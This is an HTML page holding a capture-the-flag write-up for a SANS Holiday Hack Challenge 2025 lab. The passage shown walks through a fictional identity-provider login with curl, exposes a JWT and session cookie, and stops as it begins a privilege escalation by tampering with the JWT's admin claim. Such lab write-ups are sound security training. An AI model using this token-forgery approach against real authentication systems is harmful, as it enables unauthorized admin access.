<!DOCTYPE html>
<html lang="en-us" dir="ltr" itemscope itemtype="http://schema.org/Article" data-r-output-format="html">
  <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <meta charset="utf-8">
    <meta name="viewport" content="height=device-height, width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <meta name="generator" content="Hugo 0.152.2">
    <meta name="generator" content="Relearn 8.2.0+926ba4d1230e27319cf62da0633eb3420e6af1bf">
    <meta name="description" content="Objective Difficulty Description 2/5 Hike over to Paul in the park for a gnomey authentication puzzle adventure. What malicious firmware image are the gnomes downloading? Paul Beckett mission statement Hey, I’m Paul!
I’ve been at Counter Hack since 2024 and loving every minute of it.
I’m a pentester who digs into web, API, and mobile apps, and I’m also a fan of Linux.">
    <meta name="author" content="">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Rogue Gnome Identity Provider :: SANS Holiday Hack Challenge 2025">
    <meta name="twitter:description" content="Objective Difficulty Description 2/5 Hike over to Paul in the park for a gnomey authentication puzzle adventure. What malicious firmware image are the gnomes downloading? Paul Beckett mission statement Hey, I’m Paul!
I’ve been at Counter Hack since 2024 and loving every minute of it.
I’m a pentester who digs into web, API, and mobile apps, and I’m also a fan of Linux.">
    <meta property="og:url" content="http://localhost:1313/act2/rogue-gnome-identity-provider/index.html">
    <meta property="og:site_name" content="SANS Holiday Hack Challenge 2025">
    <meta property="og:title" content="Rogue Gnome Identity Provider :: SANS Holiday Hack Challenge 2025">
    <meta property="og:description" content="Objective Difficulty Description 2/5 Hike over to Paul in the park for a gnomey authentication puzzle adventure. What malicious firmware image are the gnomes downloading? Paul Beckett mission statement Hey, I’m Paul!
I’ve been at Counter Hack since 2024 and loving every minute of it.
I’m a pentester who digs into web, API, and mobile apps, and I’m also a fan of Linux.">
    <meta property="og:locale" content="en_us">
    <meta property="og:type" content="website">
    <meta itemprop="name" content="Rogue Gnome Identity Provider :: SANS Holiday Hack Challenge 2025">
    <meta itemprop="description" content="Objective Difficulty Description 2/5 Hike over to Paul in the park for a gnomey authentication puzzle adventure. What malicious firmware image are the gnomes downloading? Paul Beckett mission statement Hey, I’m Paul!
I’ve been at Counter Hack since 2024 and loving every minute of it.
I’m a pentester who digs into web, API, and mobile apps, and I’m also a fan of Linux.">
    <meta itemprop="datePublished" content="2025-12-23T15:59:59+01:00">
    <meta itemprop="dateModified" content="2025-12-23T15:59:59+01:00">
    <meta itemprop="wordCount" content="1509">
    <title>Rogue Gnome Identity Provider :: SANS Holiday Hack Challenge 2025</title>
    <link href="/act2/rogue-gnome-identity-provider/index.xml" rel="alternate" type="application/rss+xml" title="Rogue Gnome Identity Provider :: SANS Holiday Hack Challenge 2025">
    <link href="/fonts/fontawesome/css/fontawesome-all.min.css?1767539554" rel="stylesheet" media="print" onload="this.media='all';this.onload=null;"><noscript><link href="/fonts/fontawesome/css/fontawesome-all.min.css?1767539554" rel="stylesheet"></noscript>
    <link href="/css/perfect-scrollbar/perfect-scrollbar.min.css?1767539554" rel="stylesheet">
    <link href="/css/theme.css?1767539554" rel="stylesheet">
    <link href="/css/format-html.css?1767539554" rel="stylesheet" id="R-format-style">
    <script>
      window.relearn = window.relearn || {};
      // configuration
      window.relearn.min = ``;
      window.relearn.path='\/act2\/rogue-gnome-identity-provider\/index.html';
      window.relearn.relBasePath='..\/..';
      window.relearn.relBaseUri='..\/..';
      window.relearn.absBaseUri='http:\/\/localhost:1313';
      window.relearn.disableAnchorCopy=false;
      window.relearn.disableAnchorScrolling=false;
      window.relearn.disableInlineCopyToClipboard=false;
      window.relearn.enableBlockCodeWrap=true;
      // legal
      window.relearn.getItem = (s,n) => {return s.getItem(n)};
      window.relearn.setItem = (s,n,v) => {return s.setItem(n,v)};
      window.relearn.removeItem = (s,n) => {return s.removeItem(n)};
      // translations
      window.T_Copy_to_clipboard = `Copy to clipboard`;
      window.T_Copied_to_clipboard = `Copied to clipboard!`;
      window.T_Copy_link_to_clipboard = `Copy link to clipboard`;
      window.T_Link_copied_to_clipboard = `Copied link to clipboard!`;
      window.T_Reset_view = `Reset view`;
      window.T_View_reset = `View reset!`;
      window.T_No_results_found = `No results found for "{0}"`;
      window.T_N_results_found = `{1} results found for "{0}"`;
      // variant stuff
      window.relearn.themevariants = [ 'hhc-2025' ];
      window.relearn.customvariantname = "my-custom-variant";
      window.relearn.changeVariant = function(variant) {
        var oldVariant = document.documentElement.dataset.rThemeVariant;
        window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        document.documentElement.dataset.rThemeVariant = variant;
        if (oldVariant != variant) {
          document.dispatchEvent( new CustomEvent('themeVariantLoaded', { detail: { variant, oldVariant } }) );
          window.relearn.markVariant();
        }
      }
      window.relearn.markVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant");
        document.querySelectorAll(".R-variantswitcher select").forEach((select) => {select.value = variant;});
      }
      window.relearn.initVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant") ?? "";
        if( variant == window.relearn.customvariantname ){
        }else if( !variant || !window.relearn.themevariants.includes(variant) ){
          variant = window.relearn.themevariants[0];
          window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        }
        document.documentElement.dataset.rThemeVariant = variant;
      }
      window.relearn.initVariant();
      window.relearn.markVariant();
    </script>
  </head>
  <body class="mobile-support html" data-url="/act2/rogue-gnome-identity-provider/index.html">
    <div id="R-body" class="default-animation">
      <div id="R-body-overlay"></div>
      <nav id="R-topbar">
        <div class="topbar-wrapper">
          <div class="topbar-sidebar-divider"></div>
          <div class="topbar-area topbar-area-start" data-area="start">
            <div class="topbar-button topbar-button-sidebar" data-content-empty="disable" data-width-s="show" data-width-m="hide" data-width-l="hide">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleNav()" type="button" title="Menu (CTRL&#43;ALT&#43;n)"><i class="fa-fw fas fa-bars"></i></button></span>
            </div>
            <div class="topbar-button topbar-button-toc" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="Table of Contents (CTRL&#43;ALT&#43;t)"><i class="fa-fw fas fa-list-alt"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
<nav class="TableOfContents">
  <ul>
    <li><a href="#objective">Objective</a></li>
    <li><a href="#paul-beckett-mission-statement">Paul Beckett mission statement</a></li>
    <li><a href="#rogue-gnome-terminal">Rogue Gnome Terminal</a>
      <ul>
        <li><a href="#validating-the-authentication-flow">Validating the authentication flow</a></li>
        <li><a href="#solution">Solution</a></li>
      </ul>
    </li>
    <li><a href="#paul-beckett-closing-words">Paul Beckett closing words</a></li>
  </ul>
</nav>
                </div>
              </div>
            </div>
          </div>
          <ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype="http://schema.org/BreadcrumbList"><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/index.html"><span itemprop="name">Sans Holiday Hack Challenge 2025 - Introduction</span></a><meta itemprop="position" content="1">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/act2/index.html"><span itemprop="name">Act 2</span></a><meta itemprop="position" content="2">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><span itemprop="name">Rogue Gnome Identity Provider</span><meta itemprop="position" content="3"></li>
          </ol>
          <div class="topbar-area topbar-area-end" data-area="end">
            <div class="topbar-button topbar-button-prev" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act2/dosis-network-down/index.html" title="Dosis Network Down (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-next" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act2/quantognome-leap/index.html" title="Quantognome Leap (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-more" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="More"><i class="fa-fw fas fa-ellipsis-v"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
                  <div class="topbar-area topbar-area-more" data-area="more">
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </nav>
      <div id="R-main-overlay"></div>
      <main id="R-body-inner" class="highlightable act2" tabindex="-1">
        <div class="flex-block-wrapper">
<article class="default">
  <header class="headline">
  </header>

<h1 id="rogue-gnome-identity-provider">Rogue Gnome Identity Provider</h1>

<p><a href="#R-image-cf02b84a52f9c1ba3e75f9d18a8bf5f2" class="lightbox-link"><img alt="Paul Beckett" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/paulbeckett-avatar.gif" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-cf02b84a52f9c1ba3e75f9d18a8bf5f2"><img alt="Paul Beckett" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/paulbeckett-avatar.gif"></a></p>
<h2 id="objective">Objective</h2>
<table>
  <thead>
      <tr>
          <th>Difficulty</th>
          <th>Description</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>2/5</td>
          <td>Hike over to Paul in the park for a gnomey authentication puzzle adventure. What malicious firmware image are the gnomes downloading?</td>
      </tr>
  </tbody>
</table>
<h2 id="paul-beckett-mission-statement">Paul Beckett mission statement</h2>
<blockquote>
<p>Hey, I’m Paul!</p>
<p>I’ve been at Counter Hack since 2024 and loving every minute of it.</p>
<p>I’m a pentester who digs into web, API, and mobile apps, and I’m also a fan of Linux.</p>
<p>When I’m not hacking away, you can catch me enjoying board games, hiking, or paddle boarding!</p>
<p>Something&rsquo;s afoot, but the details aren&rsquo;t sorted. Do pop back - you&rsquo;ll want in on this.</p>
<p>As a pentester, I proper love a good privilege escalation challenge, and that&rsquo;s exactly what we&rsquo;ve got here.</p>
<p>I&rsquo;ve got access to a Gnome&rsquo;s Diagnostic Interface at gnome-48371.atnascorp with the creds gnome:SittingOnAShelf, but it&rsquo;s just a low-privilege account.</p>
<p>The gnomes are getting some dodgy updates, and I need admin access to see what&rsquo;s actually going on.</p>
<p>Ready to help me find a way to bump up our access level, &gt; yeah?</p>
</blockquote>
<h2 id="rogue-gnome-terminal">Rogue Gnome Terminal</h2>
<p>This objective focuses on identity and authentication abuse by analyzing a rogue identity provider operating outside normal trust boundaries. By inspecting how authentication flows are manipulated to deliver malicious firmware images, the challenge highlights how compromised or malicious IdPs can be leveraged to distribute unauthorized code. It reinforces the need to treat identity infrastructure as critical attack surface, not just supporting plumbing.</p>
<p>Already from the initial chat with Paul we get some credentials and useful information:</p>
<ul>
<li><em>Creds</em>: <code>gnome:SittingOnAShelf</code></li>
<li><em>Address</em>: <code>gnome-48371.atnascorp</code></li>
</ul>
<p>Logging into the terminal and reading the welcome text we are presented with some helpful hints:</p>
<p><a href="#R-image-7e0c9c04fdfafb0a78f400361a0930e0" class="lightbox-link"><img alt="Welcome" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/act2-rogue-gnome-1.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-7e0c9c04fdfafb0a78f400361a0930e0"><img alt="Welcome" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/act2-rogue-gnome-1.png"></a></p>
<p>The welcome text mentions notes in file <code>~/notes</code> :</p>
<p><a href="#R-image-9a5564cd3c3b01533c2e3bbb8f4b51be" class="lightbox-link"><img alt="Notes" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/act2-rogue-gnome-2.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-9a5564cd3c3b01533c2e3bbb8f4b51be"><img alt="Notes" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/act2-rogue-gnome-2.png"></a></p>
<p>For clarity, these are the notes:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-markdown" data-lang="markdown"><span style="display:flex;"><span># Sites
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Captured Gnome:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl http://gnome-48371.atnascorp/
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## ATNAS Identity Provider (IdP):
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl http://idp.atnascorp/
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## My CyberChef website:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl http://paulweb.neighborhood/
</span></span><span style="display:flex;"><span><span style="color:#75715e">### My CyberChef site html files:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>~/www/
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Credentials
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Gnome credentials (found on a post-it):
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>Gnome:SittingOnAShelf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Curl Commands Used in Analysis of Gnome:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Gnome Diagnostic Interface authentication required page:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl http://gnome-48371.atnascorp
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Request IDP Login Page
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl http://idp.atnascorp/?return_uri=http%3A%2F%2Fgnome-48371.atnascorp%2Fauth
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Authenticate to IDP
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl -X POST --data-binary $&#39;username=gnome&amp;password=SittingOnAShelf&amp;return_uri=http%3A%2F%2Fgnome-48371.atnascorp%2Fauth&#39; http://idp.atnascorp/login
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Pass Auth Token to Gnome
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl -v http://gnome-48371.atnascorp/auth?token=&lt;insert-JWT&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Access Gnome Diagnostic Interface
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>curl -H &#39;Cookie: session=&lt;insert-session&gt;&#39; http://gnome-48371.atnascorp/diagnostic-interface
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Analyze the JWT
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>jwt_tool.py &lt;insert-JWT&gt;</span></span></code></pre></div>
<h3 id="validating-the-authentication-flow">Validating the authentication flow</h3>
<h4 id="request-the-idp-login-page">Request the IDP login page</h4>
<p>Making sure we can reach the ODP login page:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl http://idp.atnascorp/?return_uri<span style="color:#f92672">=</span>http%3A%2F%2Fgnome-48371.atnascorp%2Fauth</span></span></code></pre></div>
<h4 id="obtaining-token">Obtaining token</h4>
<p>Logging in using the credentials provided to retrieve JWT token:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl -X POST --data-binary <span style="color:#e6db74">$&#39;username=gnome&amp;password=SittingOnAShelf&amp;return_uri=http%3A%2F%2Fgnome-48371.atnascorp%2Fauth&#39;</span> http://idp.atnascorp/login</span></span></code></pre></div>
<p>Sure, it works. We got a JWT token:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!doctype html&gt;</span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">html</span> <span style="color:#a6e22e">lang</span><span style="color:#f92672">=</span><span style="color:#e6db74">en</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">title</span>&gt;Redirecting...&lt;/<span style="color:#f92672">title</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">h1</span>&gt;Redirecting...&lt;/<span style="color:#f92672">h1</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">p</span>&gt;You should be redirected automatically to the target URL: &lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQwNTYwMSwiZXhwIjoxNzY0NDEyODAxLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.jL0eAsQOkMuLYAKPRzLK_Y50EY2JdtOYjgwQlJrTtLgJDQhHyZ9U5ReYrYgL4uzO0SeAVV7t_at3tS9y282uwaZ1OuPXGc_SzG2WTh-15TFnG-yJ-bjTUaNayHlyYRSHn1S18taA9kV12Gc9pBnBZJmxDEB1hhfXa6EibHavmVs5FU0uJK2p4h7GEP3tqqJ315tWmyf2ZQJnp-IAHHOp1aoSSL4TlWnVtoUqWtmZxeDegdlXPTaAbhu4xW7j0iHkJt1RRw3JeegpmyS2i4FyDdApL8Run3Po_HDkcuYOcquX_3GyTi_FdGaJezxj3s8QGaZySszOt8juUfcOptx40w&#34;</span>&gt;http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQwNTYwMSwiZXhwIjoxNzY0NDEyODAxLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.jL0eAsQOkMuLYAKPRzLK_Y50EY2JdtOYjgwQlJrTtLgJDQhHyZ9U5ReYrYgL4uzO0SeAVV7t_at3tS9y282uwaZ1OuPXGc_SzG2WTh-15TFnG-yJ-bjTUaNayHlyYRSHn1S18taA9kV12Gc9pBnBZJmxDEB1hhfXa6EibHavmVs5FU0uJK2p4h7GEP3tqqJ315tWmyf2ZQJnp-IAHHOp1aoSSL4TlWnVtoUqWtmZxeDegdlXPTaAbhu4xW7j0iHkJt1RRw3JeegpmyS2i4FyDdApL8Run3Po_HDkcuYOcquX_3GyTi_FdGaJezxj3s8QGaZySszOt8juUfcOptx40w&lt;/<span style="color:#f92672">a</span>&gt;. If not, click the link.</span></span></code></pre></div>
<h4 id="authenticating-to-gnome-48371atnascorp">Authenticating to gnome-48371.atnascorp</h4>
<p>With token we just obtained, we can now go ahead and authentice to `gnome-48371.atnascorp``:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0"><code>curl -v -L http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQwNTYwMSwiZXhwIjoxNzY0NDEyODAxLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.jL0eAsQOkMuLYAKPRzLK_Y50EY2JdtOYjgwQlJrTtLgJDQhHyZ9U5ReYrYgL4uzO0SeAVV7t_at3tS9y282uwaZ1OuPXGc_SzG2WTh-15TFnG-yJ-bjTUaNayHlyYRSHn1S18taA9kV12Gc9pBnBZJmxDEB1hhfXa6EibHavmVs5FU0uJK2p4h7GEP3tqqJ315tWmyf2ZQJnp-IAHHOp1aoSSL4TlWnVtoUqWtmZxeDegdlXPTaAbhu4xW7j0iHkJt1RRw3JeegpmyS2i4FyDdApL8Run3Po_HDkcuYOcquX_3GyTi_FdGaJezxj3s8QGaZySszOt8juUfcOptx40w</code></pre></div>
<p>Sure enough, it works - and we got a session cookie as well:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>* Host gnome-48371.atnascorp:80 was resolved.
</span></span><span style="display:flex;"><span>* IPv6: <span style="color:#f92672">(</span>none<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>* IPv4: 127.0.0.1
</span></span><span style="display:flex;"><span>*   Trying 127.0.0.1:80...
</span></span><span style="display:flex;"><span>* Connected to gnome-48371.atnascorp <span style="color:#f92672">(</span>127.0.0.1<span style="color:#f92672">)</span> port <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>&gt; GET /auth?token<span style="color:#f92672">=</span>eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2NDQwNTYwMSwiZXhwIjoxNzY0NDEyODAxLCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.jL0eAsQOkMuLYAKPRzLK_Y50EY2JdtOYjgwQlJrTtLgJDQhHyZ9U5ReYrYgL4uzO0SeAVV7t_at3tS9y282uwaZ1OuPXGc_SzG2WTh-15TFnG-yJ-bjTUaNayHlyYRSHn1S18taA9kV12Gc9pBnBZJmxDEB1hhfXa6EibHavmVs5FU0uJK2p4h7GEP3tqqJ315tWmyf2ZQJnp-IAHHOp1aoSSL4TlWnVtoUqWtmZxeDegdlXPTaAbhu4xW7j0iHkJt1RRw3JeegpmyS2i4FyDdApL8Run3Po_HDkcuYOcquX_3GyTi_FdGaJezxj3s8QGaZySszOt8juUfcOptx40w HTTP/1.1
</span></span><span style="display:flex;"><span>&gt; Host: gnome-48371.atnascorp
</span></span><span style="display:flex;"><span>&gt; User-Agent: curl/8.5.0
</span></span><span style="display:flex;"><span>&gt; Accept: */*
</span></span><span style="display:flex;"><span>&gt; 
</span></span><span style="display:flex;"><span>&lt; HTTP/1.1 <span style="color:#ae81ff">302</span> FOUND
</span></span><span style="display:flex;"><span>&lt; Date: Sat, <span style="color:#ae81ff">29</span> Nov <span style="color:#ae81ff">2025</span> 08:41:32 GMT
</span></span><span style="display:flex;"><span>&lt; Server: Werkzeug/3.0.1 Python/3.12.3
</span></span><span style="display:flex;"><span>&lt; Content-Type: text/html; charset<span style="color:#f92672">=</span>utf-8
</span></span><span style="display:flex;"><span>&lt; Content-Length: <span style="color:#ae81ff">229</span>
</span></span><span style="display:flex;"><span>&lt; Location: /diagnostic-interface
</span></span><span style="display:flex;"><span>&lt; Vary: Cookie
</span></span><span style="display:flex;"><span>&lt; Set-Cookie: session<span style="color:#f92672">=</span>eyJhZG1pbiI6ZmFsc2UsInVzZXJuYW1lIjoiZ25vbWUifQ.aSqxvA.da6mDv_KbrbamiMFrRFIN2cFqcw; HttpOnly; Path<span style="color:#f92672">=</span>/
</span></span><span style="display:flex;"><span>&lt; 
</span></span><span style="display:flex;"><span>&lt;!doctype html&gt;
</span></span><span style="display:flex;"><span>&lt;html lang<span style="color:#f92672">=</span>en&gt;
</span></span><span style="display:flex;"><span>&lt;title&gt;Redirecting...&lt;/title&gt;
</span></span><span style="display:flex;"><span>&lt;h1&gt;Redirecting...&lt;/h1&gt;
</span></span><span style="display:flex;"><span>&lt;p&gt;You should be redirected automatically to the target URL: &lt;a href<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/diagnostic-interface&#34;</span>&gt;/diagnostic-interface&lt;/a&gt;. If not, click the link.
</span></span><span style="display:flex;"><span>* Connection <span style="color:#75715e">#0 to host gnome-48371.atnascorp left intact</span></span></span></code></pre></div>
<p>By passing the session cookie with the request I can access the <code>/diagnostic-interface</code>:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl -H <span style="color:#e6db74">&#39;Cookie: session=eyJhZG1pbiI6ZmFsc2UsInVzZXJuYW1lIjoiZ25vbWUifQ.aSqxvA.da6mDv_KbrbamiMFrRFIN2cFqcw&#39;</span> http://gnome-48371.atnascorp/diagnostic-interface</span></span></code></pre></div>
<p>However, it states that access is for admins only:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!DOCTYPE html&gt;</span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">html</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">head</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">title</span>&gt;AtnasCorp : Gnome Diagnostic Interface&lt;/<span style="color:#f92672">title</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">link</span> <span style="color:#a6e22e">rel</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;stylesheet&#34;</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text/css&#34;</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/static/styles/styles.css&#34;</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">head</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">body</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">h1</span>&gt;AtnasCorp : Gnome Diagnostic Interface&lt;/<span style="color:#f92672">h1</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">p</span>&gt;Welcome gnome&lt;/<span style="color:#f92672">p</span>&gt;&lt;<span style="color:#f92672">p</span>&gt;Diagnostic access is only available to admins.&lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">body</span>&gt;</span></span></code></pre></div>
<p>By this we I have now validated that the command line sequence indeed works and leads to successful authentication. However, the welcome screen states that &lsquo;Diagnostic access&rsquo; is only availabel to admins. Since we are dealing with JWT here, it is time to dissect it to see if we can utilize it to get admin access.</p>
<h4 id="inspecting-jwt">Inspecting JWT</h4>
<p>I am fully aware that ´notes´ file hinted at using the <code>jwt_tool</code> - but for inspecting JWT&rsquo;s I defaulted to using my goto tool <a href="https://www.jwt.io" rel="external">JWT.io</a>:</p>
<p><a href="#R-image-a02d0d719d4ebfbb3167f6b61243fe01" class="lightbox-link"><img alt="Decoding" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/act2-rogue-gnome-3.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-a02d0d719d4ebfbb3167f6b61243fe01"><img alt="Decoding" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/act2-rogue-gnome-3.png"></a></p>
<p>Most likely we can just change <code>admin</code> key to <code>true</code> and hope for the best! However - things are seldom so easy - as we will se in the next section.</p>
<h3 id="solution">Solution</h3>
<p>For solving this terminal I decided to start from scratch, thus terminating and starting a new terminal.</p>
<h4 id="obtain-jwt-token">Obtain JWT Token</h4>
<p>Just like earlier, I started getting a JWT Token:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl -X POST --data-binary <span style="color:#e6db74">$&#39;username=gnome&amp;password=SittingOnAShelf&amp;return_uri=http%3A%2F%2Fgnome-48371.atnascorp%2Fauth&#39;</span> http://idp.atnascorp/login</span></span></code></pre></div>
<p>The token:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!doctype html&gt;</span>
